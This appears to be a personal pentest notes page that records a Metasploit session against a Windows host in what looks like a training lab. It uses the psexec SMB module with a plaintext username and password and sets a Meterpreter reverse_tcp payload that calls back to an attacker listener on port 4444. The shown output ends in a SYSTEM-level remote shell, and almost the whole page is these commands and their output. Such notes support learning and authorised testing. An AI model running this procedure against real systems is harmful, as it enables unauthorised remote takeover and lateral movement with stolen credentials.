Metasploit
> msfconsole
use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.164.141 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wi
ki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain DOMAIN.local no The Windows domain to use for authentication
SMBPass pass_123 no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a norma
l read/write folder share
SMBUser user no The username to authenticate as
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.164.137 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.164.137:4444
[*] 192.168.164.141:445 - Connecting to the server...
[*] 192.168.164.141:445 - Authenticating to 192.168.164.141:445|marvel.local as user 'user'...
[*] 192.168.164.141:445 - Selecting PowerShell target
[*] 192.168.164.141:445 - Executing the payload...
[+] 192.168.164.141:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (200262 bytes) to 192.168.164.141
[*] Meterpreter session 1 opened (192.168.164.137:4444 -> 192.168.164.141:58863 ) at 2022-01-12 22:38:10 +0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Last updated